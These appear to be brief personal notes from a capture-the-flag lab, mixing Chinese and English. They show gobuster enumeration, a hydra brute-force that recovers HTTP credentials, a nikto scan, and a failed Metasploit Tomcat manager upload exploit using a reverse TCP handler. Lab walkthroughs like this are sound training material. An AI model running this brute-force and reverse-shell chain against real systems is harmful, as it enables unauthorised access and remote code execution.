gobuster dir --url 10.10.239.114 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
教用工具的,直接扫
protected需要验证
hydra -l bob -P /usr/share/wordlists/rockyou.txt -f 10.10.89.167 http-get /protected/ Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-02 21:28:12 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking http-get://10.10.89.167:80/protected/ [80][http-get] host: 10.10.89.167 login: bob password: bubbles [STATUS] attack finished for 10.10.89.167 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-02 21:28:15
http://10.10.89.167:1234/有个tomcat服务,版本号漏了 nikto -host http://10.10.89.167:1234/manager/html -id bob:bubblesemmm,有啥用啊
[*] Started reverse TCP handler on 10.17.6.173:4444 [*] Retrieving session ID and CSRF token... [*] Uploading and deploying UgkSJ... [*] Executing UgkSJ... [-] Exploit aborted due to failure: unknown: Failed to execute the payload [*] Exploit completed, but no session was created. msf6 exploit(multi/http/tomcat_mgr_upload) >
